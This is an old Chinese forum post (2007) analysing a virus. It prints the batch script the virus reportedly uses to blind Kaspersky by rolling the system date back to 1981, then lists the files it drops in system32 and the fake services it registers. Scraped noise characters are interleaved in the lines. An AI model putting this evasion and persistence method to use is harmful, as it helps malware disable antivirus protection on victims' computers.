|
|
|
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下
0 b. q# B7 Y* J6 | 6 ~ s/ I/ \5 v, q
2如果没有安装卡巴斯基,直接运行病毒代码# ? L1 L, V7 h5 ~$ f |
3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:
7 d% d8 X- S. {( ^! F5 S @echo off: ]6 T: F" o- V, k
set date=%date%; A/ l% r. T0 {9 d( r
date 1981-1-129 b* v; h8 ?9 w+ m6 w8 n' S0 ]
ping -n 45 localhost > nul
- l9 b& P# n: Z7 m1 ` date %date%
4 a8 |, P6 M0 T: S4 U3 z; l, m del %0
/ ]( V P5 a$ o3 a + `. q+ |% ?& {! z
会发现系统时间被调整到了1981年1月12日(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件
, y! c' \% f5 r %SystemRoot%\system32\*.EXE& Q; {) \, V! D2 s" v/ m6 X J: D
%SystemRoot%\system32\*T.EXE( D h. D3 `% H4 o( ^' T0 S
%SystemRoot%\system32\*.DLL
( [' A& S# ]+ `8 W %SystemRoot%\system32\delme.bat2 M* ^* s! X. N# X7 C" r8 u' |
(注:*为随机8位字母)
# u2 o. Z; D) P 并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。
% K2 O6 _% `6 r$ Z# X 其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒# L e0 P) k7 [" N
4 g! F2 P. A% o$ k j% X5 y |
|
雷达卡
发表于 2007-10-26 18:26:44
提升卡
抢沙发